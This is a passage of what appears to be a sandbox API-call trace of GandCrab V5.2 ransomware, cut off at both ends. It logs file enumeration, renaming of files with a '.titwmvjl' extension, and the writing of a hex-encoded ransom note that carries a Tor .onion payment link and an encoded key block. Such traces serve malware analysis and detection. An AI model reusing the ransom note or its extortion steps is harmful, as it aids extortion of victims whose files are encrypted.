7\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0079.876] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0079.876] CloseHandle (hObject=0x2b4) returned 1 [0079.877] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.877] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.877] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x19, wMilliseconds=0xba)) [0079.877] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.877] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0079.877] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0079.878] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\d2ca4a09d2ca4deb61a.lock") returned 70 [0079.878] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0079.880] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.881] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.881] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\") returned 46 [0079.881] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\*" [0079.881] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\*", fInfoLevelId=0x1, lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0x5036f8 [0079.881] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.881] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0079.882] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.882] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.882] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0079.882] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0079.882] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0079.882] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\d2ca4a09d2ca4deb61a.lock" [0079.882] lstrlenW (lpString=".titwmvjl") returned 9 [0079.882] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\d2ca4a09d2ca4deb61a.lock") returned 70 [0079.882] VirtualAlloc (lpAddress=0x0, dwSize=0xcc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.882] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 79 [0079.882] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\d2ca4a09d2ca4deb61a.lock") returned 70 [0079.882] lstrlenW (lpString=".lock") returned 5 [0079.882] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.882] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0079.882] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.882] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.883] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0079.883] lstrcmpW (lpString1="Extensions", lpString2=".") returned 1 [0079.883] lstrcmpW (lpString1="Extensions", lpString2="..") returned 1 [0079.883] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\", lpString2="Extensions" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions" [0079.883] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\" [0079.883] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0079.883] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.883] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0079.883] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.883] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0079.883] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.883] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0079.884] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.884] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0079.884] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.884] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.884] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\\\TITWMVJL-DECRYPT.txt") returned 78 [0079.884] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\extensions\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0079.884] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\